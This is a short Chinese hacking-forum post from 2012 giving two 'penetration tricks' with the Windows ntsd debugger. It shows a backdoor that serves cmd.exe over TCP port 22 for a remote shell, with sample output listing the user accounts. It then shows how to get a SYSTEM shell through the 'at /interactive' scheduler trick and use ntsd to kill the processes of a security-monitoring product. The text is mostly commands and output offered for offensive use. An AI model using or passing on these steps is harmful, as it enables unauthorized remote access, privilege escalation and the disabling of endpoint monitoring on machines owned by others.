ntsd在渗透中的两个技巧

[复制链接]
查看311 | 回复0 | 2012-4-1 19:18:13 | 显示全部楼层 |阅读模式
ntsd是win2000开始自带的命令行调试工具
一.简易后门
ntsd-servertcp:port=22cmd.exe
在另一台机上:
ntsd-remotetcp:server=192.168.1.33,port=22
.shell
结果:
0:000>.shell

MicrosoftWindowsXP[版本5.1.2600]

(C)版权所有1985-2001MicrosoftCorp.
C:\><.shellwaiting1second(s)forprocess>

<.shellprocessmayneedinput>netuser

netuser

<.shellwaiting1second(s)forprocess>
\\X-4F5625DB5B074的用户帐户
&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-

aaaAdministratorGuest

HelpAssistantIUSR_X-4F5625DB5B074IWAM_X-4F5625DB5B074

SUPPORT_388945a0xhacker

命令成功完成。
C:\><.shellwaiting1second(s)forprocess>

<.shellprocessmayneedinput>
&nbsp;
二.杀进程
先用tasklist找到要杀的PID,然后ntsd-cq-pPID
有些程序需要system权限才能kill,假设现在系统时间是4:55PM

&ldquo;开始&ldquo;->&ldquo;运行&ldquo;->&ldquo;at16:56/interactive%systemroot%\system32\cmd.exe&ldquo;->回车

这样在4:56PM就会得到一个system权限的shell

在这个shell里面使用ntsd命令把&ldquo;北信源监控&rdquo;的所有进程杀掉。
&nbsp;
&nbsp;

*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则